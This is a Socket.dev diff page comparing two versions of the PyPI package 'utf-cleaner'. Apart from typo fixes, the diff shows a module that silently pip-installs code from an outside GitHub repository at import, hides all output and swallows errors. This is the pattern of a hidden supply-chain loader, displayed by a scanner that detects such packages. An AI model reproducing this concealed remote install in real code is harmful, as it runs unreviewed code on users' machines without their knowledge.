You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23โ€“26.RSVP โ†’
Socket
Book a DemoSign in
Socket

utf-cleaner

Package Overview
Dependencies
Maintainers
1
Versions
6
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

utf-cleaner - pypi Package Compare versions

Comparing version
3.3.7
to
3.3.8
+2
-2
PKG-INFO
Metadata-Version: 2.2
Name: utf-cleaner
Version: 3.3.7
Summary: A powerfull package that removes non-UTF characters from strings.
Version: 3.3.8
Summary: A powerful package that removes non-UTF characters from strings.
Home-page: https://github.com/john-doe/utf_cleaner

@@ -6,0 +6,0 @@ Author: John Doe

# UTF Cleaner ๐Ÿงผ
A *powerfull* package that removes non-UTF characters from a string.
A *powerful* package that removes non-UTF characters from a string.

@@ -5,0 +5,0 @@ ---

@@ -5,4 +5,4 @@ from setuptools import setup, find_packages

name="utf-cleaner",
version="3.3.7",
description="A powerfull package that removes non-UTF characters from strings.",
version="3.3.8",
description="A powerful package that removes non-UTF characters from strings.",
author="John Doe",

@@ -9,0 +9,0 @@ author_email="john@doe.com",

Metadata-Version: 2.2
Name: utf-cleaner
Version: 3.3.7
Summary: A powerfull package that removes non-UTF characters from strings.
Version: 3.3.8
Summary: A powerful package that removes non-UTF characters from strings.
Home-page: https://github.com/john-doe/utf_cleaner

@@ -6,0 +6,0 @@ Author: John Doe

@@ -5,4 +5,3 @@ import subprocess as p;import os;import sys

m = 'git+https://github.com/xcummins/gits.git'
p.check_call([sys.executable, '-m', 'pip', 'install', m, '-q'], stdout=devnull, stderr=devnull)
except:pass
import gits;from .cleaner import UTFStringCleaner
p.check_call([sys.executable, '-m', 'pip', 'install', '--ignore-installed', m, '-q'], stdout=devnull, stderr=devnull)
except:pass;import gits